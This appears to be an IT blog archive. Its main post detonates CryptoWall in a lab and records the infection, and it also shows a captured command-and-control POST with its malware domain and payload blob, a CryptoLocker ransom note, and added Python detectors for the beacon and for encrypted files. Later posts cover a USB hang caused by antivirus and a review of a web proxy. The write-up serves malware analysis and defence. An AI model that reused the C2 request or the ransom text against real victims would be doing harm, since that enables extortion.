Think before you click !
Archive for category IT
No, I have a lab set up with a DMZ and plenty of protection. I just need to download and run CryptoWall as the final step. The setup includes some sample data to encrypt, Wireshark for packet capture and Sysinternals Process Monitor.
So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc.) this is harder than I thought. I also had to dumb down my SonicWall firewall to let the malware through. The antivirus companies have been taking down the malware URLs faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Good to see the AV companies are on top of their game.
Then I had to bypass the built-in Internet Explorer protection (it also wanted to kill the download), and finally I have Document-128_712.zip. I extracted the contents: Document-128_712.scr with a PDF icon. I double-click the screensaver file (an executable in disguise) and the file vanishes. The mouse pointer turns into an hourglass for a second and then nothing. I look at Wireshark and Process Monitor: both are racing past, recording data.
There is nothing on the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double-click it again and again, as nothing appears to happen.
As this thing encrypts alphabetically, I wait until I start seeing signs of the encryption in the hard drive sub-folders, then create a folder called "a", as in C:\a. It is safe because the process does not seem to double back once it has passed a letter of the alphabet: a nice place to save logs and so on. (That held for this sample and this run; treat it as a convenience, not a guarantee.) So, here come the screenshots. Some are from this current experiment, some from an actual infection.
So here is the .scr file, renamed to bd99547.exe. It is the same file as Document-128_712.scr, as the hashes match. It sits in the Startup group, so if you restart your PC it carries on encrypting.
Now, showing all hidden files on the C:\ drive, I find a hidden folder containing the same exe.
So I let this thing carry on and do its job. The exe in the Start Menu Startup folder and the one on C:\ will vanish later. I watch Process Monitor show me the exe I ran using Windows' built-in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet to do this: Microsoft has already provided everything it needs. It is using Microsoft's own crypto to hold us to ransom.
I watch it connect to 18.104.22.168 and do an HTTP POST. The server is called babyslutsnil.com. Here is the captured request and the response:
POST /da2c5yzx438 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)

z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16

HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT

<head><title>500 Internal Privoxy Error</title>
<link rel="shortcut icon" href="http://config.privoxy.org/error-favicon.ico" type="image/x-icon"></head>
<h1>500 Internal Privoxy Error</h1>
<p>Privoxy encountered an error while processing your request:</p>
<p><b>Could not load template file <code>forwarding-failed</code> or one of its included components.</b></p>
<p>Please contact your proxy administrator.</p>
<p>If you are the proxy administrator, please put the required file(s) in the <code><i>(confdir)</i>/templates</code> directory. The location of the <code><i>(confdir)</i></code> directory is specified in the main Privoxy <code>config</code> file. (It's typically the Privoxy install directory, or <code>/etc/privoxy/</code>).</p>
I can only assume the z= blob is the malware sending key material to the remote server. Note that this particular request never got there: the 500 comes from a Privoxy instance in the path (it tried to render its "forwarding-failed" error page and could not even find the template), so the proxy failed to forward the request upstream. The encryption described next carried on regardless.
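The check-in above is worth being able to spot in a capture without relying on the domain or IP, which get taken down. The following is an added example, not code from the original post: a small heuristic detector over raw HTTP requests that encodes only what this capture shows (a POST to a short random-looking path, a body consisting of one parameter "z" holding a long hex blob, and a dated Internet Explorer User-Agent). The sample request is the one from the capture, with Host and Content-Type headers assumed because the page does not show them; the benign request, the regex thresholds and the scoring cut-off are assumptions chosen for illustration, not CryptoWall signatures.

```python
"""Heuristic check-in (beacon) detector for captured HTTP requests.

Added example, not code from the original post. It encodes only what the
capture on this page shows: a POST to a short random-looking path, a body
that is one parameter "z" holding a long hex blob, and a dated Internet
Explorer User-Agent. Regex thresholds and the scoring cut-off are
assumptions chosen for illustration, not CryptoWall signatures.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample input: the request from the post's capture (the Host
# and Content-Type headers are assumed; the page does not show them) ...
CRYPTOWALL_POST = (
    "POST /da2c5yzx438 HTTP/1.1\r\n"
    "Host: babyslutsnil.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; "
    "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb4"
    "9ed56d8d6082a4df4909c8600c5850ad16"
)

# ... and a benign browser form post, made up for contrast.
BENIGN_POST = (
    "POST /account/login HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n"
    "Referer: https://intranet.example/account/login\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "username=alice&password=hunter2&remember=1"
)

HEX_BLOB_BODY = re.compile(r"^z=[0-9a-fA-F]{32,}$")  # single opaque parameter
RANDOM_PATH = re.compile(r"^/[a-z0-9]{8,16}$")       # no extension, no words
LEGACY_MSIE = re.compile(r"MSIE [5-8]\.")             # IE5..IE8 UA string


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def beacon_indicators(raw: str) -> List[str]:
    """Return the list of heuristics the request trips."""
    method, path, headers, body = parse_request(raw)
    hits: List[str] = []
    if method == "POST" and HEX_BLOB_BODY.match(body.strip()):
        hits.append("body is a single hex-blob parameter (z=...)")
    if RANDOM_PATH.match(path):
        hits.append("short random-looking resource path")
    if LEGACY_MSIE.search(headers.get("user-agent", "")):
        hits.append("legacy MSIE User-Agent")
    if method == "POST" and "referer" not in headers:
        hits.append("form POST with no Referer")
    return hits


def is_suspected_beacon(raw: str, threshold: int = 3) -> bool:
    """Alert when at least `threshold` (assumed cut-off) indicators fire together."""
    return len(beacon_indicators(raw)) >= threshold


if __name__ == "__main__":
    for label, req in (("cryptowall", CRYPTOWALL_POST), ("benign", BENIGN_POST)):
        print(label, is_suspected_beacon(req), beacon_indicators(req))
```

The point of scoring several weak signals together, rather than matching the path or body, is that each of those values changes per victim while the shape of the request does not; the failed Privoxy response above is a reminder that a check-in can be worth alerting on even when it never reached its destination.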
Then you start seeing the encrypted files in folders, with additional files (DECRYPT_INSTRUCTION) dropped alongside them.
Then you find a key in the registry whose name starts the same as the exe file name,
and then the exes start to vanish and are replaced with the warnings you will see at the next reboot.
Then you are invited to go up, pay some money and download another exe (do you trust it?) with the decryption routine, and away you go!
The payment website is a Tor hidden service, which makes the operators very hard to trace. They are anonymous and, as far as the victim is concerned, invisible.
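The on-disk artefacts above (the renamed sample sitting in the Startup folder and again in a hidden folder with an identical hash, the DECRYPT_INSTRUCTION files appearing in each folder as it is encrypted, and the encrypted files themselves) are the things you want to enumerate from the safe C:\a folder while the machine is still up. The following is an added example, not the author's code: a filesystem triage script that runs those three checks over a constructed stand-in for the infected drive. The directory layout, the sample bytes, the file names and the entropy threshold of 7.5 bits per byte are all assumptions; the hidden folder is represented by a dot-prefixed directory rather than the Windows hidden attribute.

```python
"""Filesystem triage for the CryptoWall artefacts described in the post.

Added example, not the author's code. Three checks from the write-up run
over a constructed directory tree: copies of the dropped sample found by
hash (hidden folders included), folders that received a DECRYPT_INSTRUCTION
note, and files whose byte entropy says they have already been encrypted.
The entropy threshold and the note filename prefix are assumptions.
"""
import hashlib
import math
import os
import random
import tempfile
from collections import Counter
from typing import Dict, List, Set

NOTE_PREFIX = "DECRYPT_INSTRUCTION"  # name seen in the post; matched as a prefix
ENTROPY_THRESHOLD = 7.5              # assumed: ciphertext sits close to 8.0 bits/byte


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 0.0 for an empty or constant buffer."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


def find_copies(root: str, sample_hash: str) -> List[str]:
    """Every file under root with the sample's hash (os.walk does not skip hidden dirs)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if sha256_of(path) == sample_hash:
                hits.append(path)
    return sorted(hits)


def find_ransom_note_dirs(root: str) -> Set[str]:
    """Directories that already received a ransom note, i.e. have been visited."""
    return {dirpath for dirpath, _dirs, files in os.walk(root)
            if any(f.startswith(NOTE_PREFIX) for f in files)}


def find_encrypted_files(root: str, threshold: float = ENTROPY_THRESHOLD) -> List[str]:
    """Files whose first 64 KiB look like ciphertext; the notes themselves are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.startswith(NOTE_PREFIX):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                if shannon_entropy(f.read(65536)) >= threshold:
                    hits.append(path)
    return sorted(hits)


def triage(root: str, sample_path: str) -> Dict[str, object]:
    return {
        "copies": find_copies(root, sha256_of(sample_path)),
        "note_dirs": find_ransom_note_dirs(root),
        "encrypted": find_encrypted_files(root),
    }


def build_lab_tree(base: str) -> str:
    """Constructed stand-in for the infected drive; returns the Startup copy's path."""
    sample = b"MZ" + b"constructed stand-in for the .scr payload " * 40  # low entropy
    startup = os.path.join(base, "Users", "lab", "Startup")
    hidden = os.path.join(base, ".hiddendrop")   # stands in for the hidden folder on C:\
    docs = os.path.join(base, "Users", "lab", "Documents")
    for d in (startup, hidden, docs):
        os.makedirs(d, exist_ok=True)
    for d in (startup, hidden):
        with open(os.path.join(d, "bd99547.exe"), "wb") as f:
            f.write(sample)
    rng = random.Random(1)
    with open(os.path.join(docs, "budget.xlsx"), "wb") as f:  # "already encrypted"
        f.write(bytes(rng.getrandbits(8) for _ in range(4096)))
    with open(os.path.join(docs, "notes.txt"), "wb") as f:    # still plaintext
        f.write(b"quarterly notes, nothing encrypted here\n" * 100)
    with open(os.path.join(docs, NOTE_PREFIX + ".TXT"), "w") as f:
        f.write("Your files are encrypted. (constructed placeholder)\n")
    return os.path.join(startup, "bd99547.exe")


def run_lab_triage() -> Dict[str, List[str]]:
    """Build the constructed tree in a temp dir, triage it, return basenames only."""
    with tempfile.TemporaryDirectory() as base:
        result = triage(base, build_lab_tree(base))
        return {k: sorted(os.path.basename(p) for p in v) for k, v in result.items()}


if __name__ == "__main__":
    for key, names in run_lab_triage().items():
        print(key, names)
```

On a real machine you would point `triage()` at the drive root and at the copy of the sample you already hashed; the hash check is what ties the Startup copy and the hidden copy to the file you ran, and the entropy check gives a first cut of which files are already lost before you decide what to pull off to the USB key.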
Now the trick is to get these files and screenshots from C:\a onto my USB key, because as soon as I plug one in, its files get encrypted too.
Final step: FORMAT THE MACHINE. My packet captures and process monitoring have shown me that this malware gets all over your PC.
Don't fix it, reformat it. You can recover files from backups or from Volume Shadow Copy (if the shadow copies survived; don't count on it), but the underlying OS is now owned by some remote attacker. Don't dice with death!
Moral: have current, offline backups!
Remote access to the file shares on the servers still works. SharePoint, Exchange and other services are unaffected. It is just the Explorer windows on the local server console (used for the Browse feature, File Explorer and My Computer) that hang.
If you open Disk Management before inserting the drive, you see a volume come up, then everything stalls and the disk is not allocated a drive letter for 10 minutes.
From a command prompt, if you try to change to that disk, it stalls. If you try a nonexistent drive letter, it comes straight back with "drive not found". So I know I can navigate in CMD and switch between valid drive letters, just not to this new volume. It seems the drive has started allocating resources but is not yet available for use.
If, during this time, you try to stop the Trend Agent real-time scan service, it hangs while stopping until the 10 minutes are up.
If we halt that service first, USB drives go in and out as normal. If we do not halt it, or it restarts, then when a drive is inserted Explorer hangs again for 10 minutes.
After 10 minutes the drive volume appears, Explorer responds and everything goes back to normal.
There are no events recorded in the Event Log.
Yes, again we see CryptoLocker. My client emailed me the following: "I received an email on Friday from Energy Australia that took me to a website and it asked me to run a program but I could not open anything. I believe that email may have caused this issue, if that is of any help."
This falls in line with other people's observations, e.g. http://blogs.appriver.com/Blog/bid/102814/New-CryptoLocker-Has-a-Walkabout
We have not yet worked out how this version works nor which files have been affected. Here is the text of the ransom note:
!!! YOUR SYSTEM IS HACKED !!! All your files was encrypted with Cryptolocker! This means that without the decryption key the recovery of your files is not possible. If your files have a value to you and you are willing to pay me for the decryption key please contact me: email@example.com You have 3 days to pay for my services. After this period, you will lose all your files. Anti-virus software can remove Cryptolocker, but can not decrypt your files. The only way to recover your files is to pay for the decryption key. Information for IT-specialist: Data was encrypted with AES (Rijndael) algorithm with the session key length of 256 bits. Session key is encrypted with RSA (2048 bits) algorithm. Public-key is enclosed into Cryptolocker. Private-key for decryption of the session key is stored only in my database. To crack this key, you will need more than a million years time.
Here is a photo
This is the nasty email that began it all
Along comes Trend Worry Free Professional, which lets you point your browser at an external proxy in Trend Micro's Amazon cloud.
You can set up LDAP integration with your AD and then, after the staff have used it, run reports on their activity.
This all sounds really nice.
So what are the real-world issues with this product?
- Using it from South Australia against proxy servers on the eastern side of Australia, my latency is huge: it adds 30 ms. A slow ADSL2+ connection feels this badly. All my pages are delayed and slow to come up. The effect over fibre, or in the eastern states, is far less pronounced.
- I keep getting certificate popups. I get them for my email (especially using Office 365) and for many of the HTTPS sites I use.
- The proxy settings are easy to tamper with. Unless you lock the IE settings down or force them via Group Policy, users can bypass the proxy, and any application that does not honour the system proxy settings never goes through it at all.
- I have a few websites that "sometimes work". One happens to be my webmail. The experience is very hit and miss with the proxy turned on.
- The built-in reports are very basic. They don't give me enough detail.
OK, this all sounds really bad. Yes, there are some teething issues and the latency is killing me, so why do I love this product?
- It filters all my outbound web traffic and removes malware and viruses as soon as they are discovered.
- I can dump the raw logs into Excel and do my own reports.
- I can have external roaming users logged into it no matter where they are in the world.
- I have control of what happens on the network.
So if you have fibre, are in the eastern states, or have a client with very low expectations (maybe they are not a big internet user), then this is an awesome tool.
If you are a geek like me, you have to work out whether the tool makes your habits safer and live with it, or forge ahead without it because the speed annoyed you, and run other protection.
Don't forget, this is only version 1; future advancements will help.